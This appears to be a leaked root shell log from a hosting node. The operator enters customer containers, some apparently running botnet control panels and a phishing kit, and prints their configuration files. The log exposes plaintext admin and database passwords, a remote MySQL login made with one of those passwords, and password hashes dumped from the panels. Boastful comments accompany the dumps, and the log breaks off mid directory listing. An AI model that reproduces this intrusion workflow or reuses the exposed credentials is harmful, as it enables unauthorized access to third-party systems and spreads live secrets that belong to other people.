ip route add 193.107.17.66 dev venet0 scope link
nano /etc/sysctl.conf
service sysctl restart
sysctl -p
sysctl -a
ip route
ip route add 193.107.17.66 dev eth0 scope link
ip route add 193.107.17.67 dev eth0 scope link
ip rute
ip route
service network restart
ifup-local
ip route
ip route add 193.107.17.0/24 dev eth0
route add 193.107.17.0/24 netmask 255.255.255.0 dev eth1
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
route
redhat-config-network
network-admin
route add default2 gw 193.107.17.1 eth0
route add default gw 193.107.17.1 eth0
route
service httpd stop
route add default gw 193.107.17.1 eth0
route add default2 gw 193.107.17.1 eth0
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68
ip route add 193.107.17.0/24 dev eth0
ifconfig
route add default gw 193.107.17.1 eth0
ip route add 193.107.17.0/24 dev eth0
service network restart
ip route add 193.107.17.0/24 dev eth0
route add default gw 193.107.17.1 eth0
ip route add 193.107.17.0/24 dev venet0
netstat
paswd
passwd
modprobe tun
vzctl set 310 --devices c:10:200:rw --save
vzctl set 310 --capability net_admin:on --save
modprobe ipt_mark
modprobe ipt_MARK
modprobe tun
vzctl stop 310
vzctl set 310 --capability net_admin:on --save
vzctl set 310 --devices c:10:200:rw --save
vzctl start 310
vzctl exec 310 mkdir -p /dev/net
vzctl exec 310 mknod /dev/net/tun c 10 200
vzctl exec 310 chmod 600 /dev/net/tun
df
top
su bnetvm
iptables -A INPUT -p tcp --destination-port 80 -j DROP
top
hitop
htop
ftop
iftop
netstat
# ifconfig
eth0 Link encap:Ethernet HWaddr E0:CB:4E:4F:A7:D8
inet addr:193.107.16.82 Bcast:193.107.16.255 Mask:255.255.255.0
inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0
TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:517778892 (493.7 MiB) TX bytes:429952789 (410.0 MiB)
Interrupt:90 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:3830 errors:0 dropped:0 overruns:0 frame:0
TX packets:3830 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:257453 (251.4 KiB) TX bytes:257453 (251.4 KiB)
venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0
TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:387733783 (369.7 MiB) TX bytes:408435813 (389.5 MiB)
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 9044/tcpserver
tcp 0 0 0.0.0.0:7778 0.0.0.0:* LISTEN 338/kloxo.httpd
tcp 0 0 127.0.0.1:7776 0.0.0.0:* LISTEN 22868/php
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 9051/tcpserver
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 8760/tcpserver
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 6813/tcpserver
tcp 0 0 0.0.0.0:7779 0.0.0.0:* LISTEN 744/php
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN 31415/sendmail: MTA
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 28959/xinetd
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 27340/named
tcp 0 0 193.107.16.217:53 0.0.0.0:* LISTEN 21090/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 21090/named
tcp 0 0 0.0.0.0:7777 0.0.0.0:* LISTEN 20789/kloxo.httpd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 12611/xinetd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 21054/sshd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 18864/mysqld
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2855/apache2
tcp 0 0 193.107.17.80:53 0.0.0.0:* LISTEN 14937/named
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2255/mysqld
tcp 0 0 193.107.17.81:53 0.0.0.0:* LISTEN 29195/named
tcp 0 0 193.107.16.197:443 0.0.0.0:* LISTEN 19137/lighttpd
tcp 0 0 0.0.0.0:55986 0.0.0.0:* LISTEN 350/perl
tcp 0 0 0.0.0.0:65500 0.0.0.0:* LISTEN 22852/perl
tcp 0 0 0.0.0.0:5544 0.0.0.0:* LISTEN 6594/sshd
tcp 0 0 193.107.17.69:53 0.0.0.0:* LISTEN 24903/named
tcp 0 0 193.107.16.184:53 0.0.0.0:* LISTEN 16961/named
tcp 0 0 193.107.16.183:53 0.0.0.0:* LISTEN 24588/named
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 25293/sendmail: MTA
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 6276/portmap
tcp 0 0 193.107.16.196:53 0.0.0.0:* LISTEN 30862/named
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 15210/smbd
tcp 0 0 193.107.17.67:53 0.0.0.0:* LISTEN 25565/named
tcp 0 0 193.107.16.81:53 0.0.0.0:* LISTEN 12513/named
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 21079/php-fpm.conf)
tcp 0 0 127.0.0.1:8886 0.0.0.0:* LISTEN 8978/php
tcp 0 0 193.107.16.55:53 0.0.0.0:* LISTEN 8944/named
tcp 0 0 0.0.0.0:8887 0.0.0.0:* LISTEN 7026/hypervm.httpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6608/cupsd
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 7026/hypervm.httpd
tcp 0 0 193.107.17.83:53 0.0.0.0:* LISTEN 18447/named
tcp 0 0 0.0.0.0:8889 0.0.0.0:* LISTEN 8978/php
tcp 0 0 0.0.0.0:985 0.0.0.0:* LISTEN 6315/rpc.statd
tcp 0 0 193.107.17.68:53 0.0.0.0:* LISTEN 27340/named
tcp 0 0 193.107.16.55:443 0.0.0.0:* LISTEN 16889/lighttpd
tcp 0 0 127.0.0.1:2000 0.0.0.0:* LISTEN 25205/varnishd
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20954/nginx
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 15210/smbd
tcp 0 0 :::80 :::* LISTEN 28969/httpd
tcp 0 0 :::21 :::* LISTEN 31096/proftpd: (acc
tcp 0 0 ::1:953 :::* LISTEN 27340/named
tcp 0 0 :::22 :::* LISTEN 21198/sshd
tcp 0 0 :::443 :::* LISTEN 2460/httpd
tcp 0 0 :::5544 :::* LISTEN 6594/sshd
tcp 0 0 :::53 :::* LISTEN 16961/named
udp 0 0 0.0.0.0:111 0.0.0.0:* 6276/portmap
udp 0 0 193.107.16.55:53 0.0.0.0:* 8944/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 8944/named
udp 0 0 193.107.16.197:53 0.0.0.0:* 15203/tinydns
udp 0 0 193.107.16.81:53 0.0.0.0:* 12513/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 12513/named
udp 0 0 193.107.16.184:53 0.0.0.0:* 16961/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 16961/named
udp 0 0 193.107.17.80:53 0.0.0.0:* 14937/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 14937/named
udp 0 0 193.107.17.83:53 0.0.0.0:* 18447/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 18447/named
udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd
udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 14895/nmbd
udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd
udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 14895/nmbd
udp 0 0 193.107.16.217:53 0.0.0.0:* 21090/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 21090/named
udp 0 0 193.107.16.183:53 0.0.0.0:* 24588/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 24588/named
udp 0 0 193.107.17.69:53 0.0.0.0:* 24903/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 24903/named
udp 0 0 193.107.17.67:53 0.0.0.0:* 25565/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 25565/named
udp 0 0 193.107.17.68:53 0.0.0.0:* 27340/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 27340/named
udp 0 0 193.107.17.81:53 0.0.0.0:* 29195/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 29195/named
udp 0 0 193.107.16.196:53 0.0.0.0:* 30862/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 30862/named
udp 0 0 0.0.0.0:631 0.0.0.0:* 6608/cupsd
udp 0 0 0.0.0.0:979 0.0.0.0:* 6315/rpc.statd
udp 0 0 0.0.0.0:982 0.0.0.0:* 6315/rpc.statd
udp 0 0 0.0.0.0:10000 0.0.0.0:* 22852/perl
udp 0 0 0.0.0.0:10000 0.0.0.0:* 350/perl
udp 0 0 0.0.0.0:53957 0.0.0.0:* 29116/avahi-daemon:
udp 0 0 0.0.0.0:5353 0.0.0.0:* 29116/avahi-daemon:
udp 0 0 :::53 :::* 16961/named
udp 0 0 :::53 :::* 24588/named
udp 0 0 :::5353 :::* 29116/avahi-daemon:
udp 0 0 :::56885 :::* 29116/avahi-daemon:
# cd /home/
# ls
total 104
drwxr-xr-x 21 root root 4096 Oct 3 08:21 .
drwxr-xr-x 25 root root 4096 Oct 10 05:48 ..
drwx------ 2 bdgatevm bdgatevm 4096 Aug 22 05:35 bdgatevm
drwx------ 2 bnetvm bnetvm 4096 May 21 02:36 bnetvm
drwx------ 2 fredvm fredvm 4096 Sep 5 08:40 fredvm
drwxr-xr-x 2 root root 4096 May 12 01:07 httpd
drwxr-xr-x 7 root root 4096 Aug 22 06:08 hypervm
drwx------ 2 iodasvm iodasvm 4096 Jun 13 03:25 iodasvm
drwx------ 2 ixdevm ixdevm 4096 Sep 9 09:19 ixdevm
drwx------ 2 lxlabs lxlabs 4096 May 12 01:04 lxlabs
drwx------ 2 rootvm rootvm 4096 Aug 15 04:15 rootvm
drwx------ 2 scriptstvm scriptstvm 4096 May 22 02:41 scriptstvm
drwx------ 2 sethvm sethvm 4096 Oct 3 08:21 sethvm
drwx------ 2 spike80vm spike80vm 4096 Sep 7 01:32 spike80vm
drwx------ 2 spikevm spikevm 4096 Jun 7 09:21 spikevm
drwx------ 2 stansecuvm stansecuvm 4096 May 18 03:40 stansecuvm
drwx------ 2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm
drwx------ 2 truevm truevm 4096 May 16 06:29 truevm
drwx------ 2 wohovm wohovm 4096 Sep 16 03:03 wohovm
drwx------ 2 xtothecvm xtothecvm 4096 Jun 9 08:40 xtothecvm
drwx------ 2 y00vm y00vm 4096 Jun 13 03:02 y00vm
# du -h
20K ./ixdevm
20K ./scriptstvm
20K ./fredvm
20K ./rootvm
20K ./spikevm
20K ./stansecuvm
20K ./xtothecvm
20K ./iodasvm
20K ./bdgatevm
20K ./y00vm
20K ./stansocksvm
20K ./spike80vm
32K ./lxlabs
20K ./wohovm
8.0K ./httpd
20K ./sethvm
32K ./hypervm/xen/template
40K ./hypervm/xen
1.7M ./hypervm/selfbackup/self/__backup
1.7M ./hypervm/selfbackup/self
1.7M ./hypervm/selfbackup
4.0K ./hypervm/vps/fred.vm/__backup
8.0K ./hypervm/vps/fred.vm
12K ./hypervm/vps
16K ./hypervm/lxguard
8.0K ./hypervm/client/admin
16K ./hypervm/client
1.8M ./hypervm
20K ./bnetvm
20K ./truevm
2.2M .
# mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 717502
Server version: 5.0.92 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
| 29818 |
+----------+
1 row in set (0.00 sec)
mysql> select * from list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
| 1 | admin | 76a2173be6393254e72ffa4d6df1030a | 255 | dark | en |
| 2 | test | 598d4c200461b81522a3328565c25f7c | 255 | dark | en |
+----+-------+----------------------------------+-------------+-------+-----+
2 rows in set (0.00 sec)
mysql> Ctrl-C -- exit!
Aborted
# 29818 bots here, not bad...^C
#
# We better check out the other VMs
# vzlist
Warning: Unknown iptable module: ipt_connlimit, skipped
CTID NPROC STATUS IP_ADDR HOSTNAME
130 64 running 193.107.16.55 true
140 60 running 193.107.16.197 stansecu
160 62 running 193.107.16.81 testing
180 18 running 193.107.16.184 scriptst
240 59 running 193.107.17.80 spike
250 34 running 193.107.17.82 vps287.cyberhost.kz
260 59 running 193.107.17.83 y00
270 38 running 193.107.17.66 iodas
300 34 running 193.107.16.217 Ro0t.cyberhost.kz
310 23 running 193.107.16.183 stansocks
340 56 running 193.107.17.69 badgate.cyberhost.kz
350 59 running 193.107.17.67 fr3d.cyberhost.kz
360 61 running 193.107.17.68 vps241.cyberhost.kz
370 61 running 193.107.17.81 vps249.cyberhost.kz
380 64 running 193.107.16.196 vps254.cyberhost.kz
390 10 running 193.107.16.185 vps522.cyberhost.kz
# vzctl enter 130
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 130
[root@true /]# last
reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:55)
reboot system boot 2.6.18-238.9.1.e Tue Oct 4 10:42 (6+01:17)
root pts/0 77-20-18-64-dyni Tue Oct 4 10:04 - down (00:37)
reboot system boot 2.6.18-238.9.1.e Tue Oct 4 09:54 (00:47)
root pts/0 p5483a590.dip.t- Sat Oct 1 12:50 - 12:55 (00:05)
root pts/0 p5483a590.dip.t- Sat Oct 1 07:48 - 08:31 (00:43)
reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:19 (5+23:56)
reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:11 (00:08)
reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:10 (00:00)
reboot system boot 2.6.18-238.9.1.e Tue Sep 27 09:50 (04:19)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:23 (18:26)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:20 (00:01)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:19 (00:01)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:16 (00:01)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:05 (00:10)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:54 (00:10)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:52 (00:01)
reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:49 (00:02)
root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03 (00:31)
root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32 (00:10)
reboot system boot 2.6.18-238.9.1.e Thu Sep 1 11:18 (25+03:30)
root pts/0 p5483df28.dip.t- Thu Sep 1 10:49 - down (00:29)
reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (01:19)
reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (00:00)
[root@true /]# cd /home/
[root@true home]# ls -la
total 60
drwxr-xr-x 15 root root 4096 Oct 1 12:50 .
drwxr-xr-x 23 root root 4096 Oct 10 13:48 ..
drwx------ 3 admin admin 4096 Sep 1 11:01 admin
drwx------ 2 axfrdns axfrdns 4096 Sep 1 11:10 axfrdns
drwx------ 2 dnscache dnscache 4096 Sep 1 11:10 dnscache
drwx------ 2 dnslog dnslog 4096 Sep 1 11:10 dnslog
drwxr-xr-x 3 root root 4096 Sep 1 11:12 httpd
drwxr-xr-x 3 root root 4096 Oct 1 07:55 irc
drwxr-xr-x 6 root root 4096 Sep 2 04:15 kloxo
drwxr-xr-x 3 root root 4096 Sep 1 11:00 lxadmin
drwx------ 2 lxlabs lxlabs 4096 Sep 1 10:53 lxlabs
drwxr-xr-x 3 root root 4096 Oct 1 12:52 mocks
drwx------ 2 nouser nogroup 4096 Sep 1 10:53 nouser
drwx------ 2 tinydns tinydns 4096 Sep 1 11:10 tinydns
drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 true.cyberhost.kz
[root@true true.cyberhost.kz]# cd true.cyberhost.kz/
[root@true true.cyberhost.kz]# ls -la
total 36
drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 .
drwxr-xr-x 15 root root 4096 Oct 1 12:50 ..
-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 33 Sep 1 11:12 .bash_logout
-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 176 Sep 1 11:12 .bash_profile
-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 124 Sep 1 11:12 .bashrc
drwxr-xr-x 2 true.cyberhost.kz true.cyberhost.kz 4096 Sep 1 11:12 kloxoscript
drwxr-xr-x 2 root root 4096 Oct 5 05:02 __processed_stats
lrwxrwxrwx 1 root root 42 Sep 1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/
-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 11 Sep 1 11:12 .qmail
drwxr-xr-x 5 true.cyberhost.kz apache 4096 Oct 4 10:31 true.cyberhost.kz
[root@true true.cyberhost.kz]# cd true.cyberhost.kz/
[root@true true.cyberhost.kz]# ls
Design portokalli wordpress
[root@true true.cyberhost.kz]# cd wordpress/
[root@true wordpress]# ls
index.php
[root@true wordpress]# cat index.php
<h1><center>Visit CyberNetwork</h1><a href="http://www.cyberbase.us/">KLICK HIER!!!</a>
[root@true wordpress]# # nothing to see here
[root@true true.cyberhost.kz]# logout
exited from CT 130
# vzctl enter 140
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 140
[root@stansecu /]# last
reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:59)
root pts/0 p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15 (04:06)
root pts/1 p57b10668.dip0.t Sun Oct 9 20:17 - 01:20 (05:02)
root pts/0 193.107.17.30 Sun Oct 9 20:05 - 20:30 (00:24)
root pts/0 193.107.17.30 Sun Oct 9 19:49 - 20:05 (00:16)
root pts/0 193.107.17.30 Fri Sep 30 16:00 - 21:16 (05:16)
stanwww pts/0 193.107.17.30 Fri Sep 30 15:59 - 15:59 (00:00)
reboot system boot 2.6.18-238.9.1.e Thu Aug 11 15:15 (59+20:45)
reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:44 (01:02)
reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:32 (01:14)
reboot system boot 2.6.18-238.9.1.e Wed Jul 13 17:11 (27+16:18)
root pts/0 193.107.16.213 Sun Jul 10 19:59 - 23:31 (03:32)
root pts/0 92.241.165.69 Fri Jul 1 11:24 - 18:41 (07:16)
root pts/0 92.241.165.69 Thu Jun 30 15:40 - 19:48 (04:07)
root pts/0 92.241.165.69 Tue Jun 28 18:52 - 18:52 (00:00)
root pts/0 92.241.165.69 Wed Jun 22 06:29 - 07:36 (01:07)
root pts/0 92.241.165.69 Mon Jun 20 07:41 - 08:24 (00:43)
root pts/0 92.241.165.69 Tue Jun 14 16:03 - 16:43 (00:39)
root pts/0 92.241.165.69 Mon Jun 13 11:27 - 18:21 (06:54)
root pts/0 92.241.165.69 Sat Jun 11 05:45 - 22:19 (16:33)
root pts/0 92.241.165.69 Mon May 30 12:58 - 13:01 (00:02)
stanwww pts/0 92.241.165.69 Mon May 30 12:58 - 12:58 (00:00)
root pts/0 92.241.165.69 Fri May 27 09:32 - 16:07 (06:34)
root pts/0 92.241.165.69 Sun May 22 20:22 - 20:22 (00:00)
root pts/0 92.241.165.69 Sat May 21 12:08 - 14:10 (02:02)
root pts/0 92.241.165.69 Wed May 18 16:41 - 21:01 (04:20)
reboot system boot 2.6.18-238.9.1.e Wed May 18 16:08 (55+14:20)
root pts/1 92.241.165.69 Wed May 18 15:50 - down (00:17)
root pts/0 77-20-18-64-dyni Wed May 18 12:23 - down (03:45)
reboot system boot 2.6.18-238.9.1.e Wed May 18 11:45 (04:22)
wtmp begins Wed May 18 11:45:54 2011
[root@stansecu /]# cd /home/
[root@stansecu home]# ls
admin axfrdns dnscache dnslog httpd kloxo lxadmin lxlabs nouser stanwww tinydns
[root@stansecu home]# cd stanwww/
[root@stansecu stanwww]# ls -la
total 44
drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 .
drwxr-xr-x 13 root root 4096 May 18 15:00 ..
-rw-r--r-- 1 stanwww stanwww 33 May 18 15:00 .bash_logout
-rw-r--r-- 1 stanwww stanwww 176 May 18 15:00 .bash_profile
-rw-r--r-- 1 stanwww stanwww 124 May 18 15:00 .bashrc
drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 kloxoscript
drwxr-xr-x 2 stanwww stanwww 4096 May 21 12:33 pass
drwxr-xr-x 3 stanwww stanwww 4096 Aug 7 17:22 phishingtool
drwxr-xr-x 2 root root 4096 Oct 10 03:57 __processed_stats
lrwxrwxrwx 1 root root 37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/
-rw-r--r-- 1 stanwww stanwww 11 May 18 15:00 .qmail
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in
[root@stansecu stanwww]# cd stanley.secure-host.in
[root@stansecu stanley.secure-host.in]# ls -la
total 220
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .
drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 ..
drwxr-xr-x 2 stanwww stanwww 4096 Jul 10 11:14 bin
drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 cgi-bin
drwxr-xr-x 2 stanwww stanwww 4096 Aug 11 2005 images
-rwxr-xr-x 1 stanwww stanwww 1217 May 18 22:32 index.html
drwxr-xr-x 2 stanwww stanwww 4096 Jul 9 18:25 java
drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 phishingtool
drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 snapbn
-rw-r--r-- 1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll
drwxr-xr-x 7 stanwww stanwww 4096 Sep 30 16:24 umbralo
drwxr-xr-x 9 stanwww stanwww 4096 May 21 12:32 unique
[root@stansecu public_html]# cd phishingtool/
[root@stansecu phishingtool]# ls -la
total 792
drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 .
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 ..
-rw-r--r-- 1 stanwww stanwww 601 Jul 10 11:45 config.php
-rw-r--r-- 1 stanwww stanwww 2121 May 18 20:17 css.css
-rw-r--r-- 1 stanwww stanwww 1973 May 18 20:17 export.php
drwxr-xr-x 2 stanwww stanwww 4096 Jun 12 19:53 exports
-rw-r--r-- 1 stanwww stanwww 750121 May 18 20:17 header.gif
-rw-r--r-- 1 stanwww stanwww 490 May 18 20:17 im.php
-rw-r--r-- 1 stanwww stanwww 1639 May 18 20:17 index.php
-rw-r--r-- 1 stanwww stanwww 2230 May 18 20:17 login.php
-rw-r--r-- 1 stanwww stanwww 111 May 18 20:17 logout.php
-rw-r--r-- 1 stanwww stanwww 1590 May 18 20:17 logs.php
drwxr-xr-x 6 stanwww stanwww 4096 Jul 10 11:48 phishing
-rw-r--r-- 1 stanwww stanwww 889 May 18 20:18 private.php
tansecu phishingtool]# cat config.php
<?php
$username = "6lJT2iDhi"; // Admin-Benutzername
$password = "8o4RLO3AE7wcarxDm8uB"; // Admin-Passwort
$dbhost = "localhost"; // Der Datenabnk-Host, meistens "localhost". Wenn es nicht funktioniert, beim Provider nachschauen bzw. nachfragen
$dbuser = "stanwww_phish"; // Datenbank-User
$dbpw = "MqKl02dmSSp"; // Datenbank-Passwort
$dbdb = "stanwww_phish"; // Name der Datenbank
////////////////////// AB HIER NICHTS MEHR ÄNDERN //////////////////////
mysql_connect($dbhost,$dbuser,$dbpw) or die ("Keine Verbindung moeglich");
mysql_select_db($dbdb) or die ("Die Datenbank existiert nicht.");
?>
root@stansecu phishingtool]# cd ..
[root@stansecu public_html]# cd snapbn/
[root@stansecu snapbn]# ls -la
total 48
drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 .
drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 ..
-rw-r--r-- 1 stanwww stanwww 4217 Jun 6 18:56 adv_state.php
drwxr-xr-x 5 stanwww stanwww 4096 Jun 6 19:05 backend
-rw-r--r-- 1 stanwww stanwww 2237 Jun 6 18:56 control.php
drwxr-xr-x 2 stanwww stanwww 4096 Oct 9 16:26 frontend
-rw-r--r-- 1 stanwww stanwww 3047 Jun 6 18:56 gate.php
-rw-r--r-- 1 stanwww stanwww 931 Jun 6 18:56 grab_zone.php
drwxr-xr-x 2 stanwww stanwww 4096 Jun 6 18:54 images
-rw-r--r-- 1 stanwww stanwww 38 Jun 6 18:56 ip.php
drwxr-xr-x 3 stanwww stanwww 4096 Jun 6 18:56 theme
[root@stansecu snapbn]# cat backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME', "dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT', "/home/stanwww/stanley.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY', 120); // Delay for bot-reconnect
define('TIMEOUT', 2200);
define('DEAD_TOUT', 60*60*24*7);
define('COUNTRY_P', 3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX', ''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST', 'localhost'); // mysql host
define('MYSQ_USER', 'stanwww_snap'); // mysql username
define('MYSQL_PASS', 'fYXgyPRB8kv'); // mysql password
define('MYSQL_DB', 'stanwww_snap'); // database name where the tables are
?>
[root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4094
Server version: 5.0.92 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| count(*) |
+----------+
| 2553 |
+----------+
1 row in set (0.01 sec)
mysql> SELECT * FROM list_users;
+----+----------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+----------+----------------------------------+-------------+-------+-----+
| 1 | stan | 37a80cc8fffebfa607292c8814d89473 | 255 | dark | en |
| 2 | youmetoo | 033f706d5832000e32c14ba6453ac415 | 255 | dark | en |
+----+----------+----------------------------------+-------------+-------+-----+
2 rows in set (0.00 sec)
mysql> 2.5k bots ... well
mysql> Ctrl-C -- exit!
Aborted
[root@stansecu snapbn]# logout
exited from CT 140
# vzctl enter 160
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 160
[root@testing /]# cd /home/
[root@testing home]# ls -la
total 88
drwxr-xr-x 22 root root 4096 Sep 23 12:07 .
drwxr-xr-x 23 root root 4096 Oct 10 13:49 ..
drwx------ 3 admin admin 4096 May 21 11:17 admin
drwx------ 2 axfrdns axfrdns 4096 May 21 11:28 axfrdns
drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 deluxa
drwx------ 2 dnscache dnscache 4096 May 21 11:28 dnscache
drwx------ 2 dnslog dnslog 4096 May 21 11:28 dnslog
drwxr-xr-x 12 root root 4096 Sep 23 12:07 httpd
drwxr-xr-x 6 root root 4096 May 22 04:07 kloxo
drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 lolboter
drwxr-xr-x 3 root root 4096 May 21 11:17 lxadmin
drwx------ 2 lxlabs lxlabs 4096 May 21 11:03 lxlabs
drwxr-x--- 5 lyrex apache 4096 Sep 1 03:57 lyrex
drwxr-x--- 5 master apache 4096 Sep 24 03:58 master
drwx------ 2 nouser nogroup 4096 May 21 11:03 nouser
drwxr-x--- 5 pep apache 4096 Jul 5 03:57 pep
drwxr-x--- 6 pure apache 4096 Jul 5 22:32 pure
drwxr-x--- 5 sprueche apache 4096 Jun 26 03:57 sprueche
drwxr-x--- 5 symb apache 4096 Jun 15 03:57 symb
drwxr-x--- 5 time apache 4096 May 22 03:57 time
drwx------ 2 tinydns tinydns 4096 May 21 11:28 tinydns
drwxr-x--- 5 winfuture apache 4096 May 23 03:57 winfuture
root@testing home]# cd deluxa/
[root@testing deluxa]# ls -la
total 36
drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 .
drwxr-xr-x 22 root root 4096 Sep 23 12:07 ..
-rw-r--r-- 1 deluxa deluxa 33 Jun 14 10:46 .bash_logout
